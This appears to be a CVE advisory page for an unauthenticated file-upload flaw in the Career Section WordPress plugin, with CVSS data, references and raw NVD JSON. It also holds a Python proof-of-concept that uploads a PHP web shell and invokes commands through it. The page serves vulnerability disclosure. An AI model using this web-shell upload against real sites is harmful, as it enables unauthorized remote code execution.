CVE-2026-6271

Description

The Career Section plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 1.7 via the CV upload handler. This is due to missing file type validation. This makes it possible for unauthenticated attackers to upload files that may be executable, which makes remote code execution possible.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WordPress Career Section 插件 <= 1.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target = 'http://example.com'
upload_url = f'{target}/wp-admin/admin-ajax.php' # Placeholder URL, actual path depends on plugin version

# Malicious PHP payload
php_payload = '<?php system($_GET["cmd"]); ?>'
files = {
    'file': ('shell.php', php_payload, 'application/octet-stream')
}
data = {
    'action': 'career_section_upload_action' # Placeholder action
}

try:
    # Send upload request
    response = requests.post(upload_url, files=files, data=data)
    if response.status_code == 200:
        print("[+] File uploaded successfully.")
        print(f"[+] Check your shell at: {target}/wp-content/uploads/shell.php?cmd=whoami")
    else:
        print("[-] Upload failed.")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6271
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6271
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6271/
[4] VulDB https://vuldb.com/cve/CVE-2026-6271
[5] https://plugins.trac.wordpress.org/changeset/3507785/career-section
[6] https://plugins.trac.wordpress.org/changeset/3507912/career-section
[7] https://plugins.trac.wordpress.org/changeset/3507917/career-section
[8] https://www.wordfence.com/threat-intel/vulnerabilities/id/005d1abc-761d-4f9a-bc21-aad63e8efd66?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6271", "sourceIdentifier": "[email protected]", "published": "2026-05-14T07:16:20.650", "lastModified": "2026-05-14T14:28:41.283", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Career Section plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 1.7 via the CV upload handler. This is due to missing file type validation. This makes it possible for unauthenticated attackers to upload files that may be executable, which makes remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3507785/career-section", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3507912/career-section", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3507917/career-section", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/005d1abc-761d-4f9a-bc21-aad63e8efd66?source=cve", "source": "[email protected]"}]}}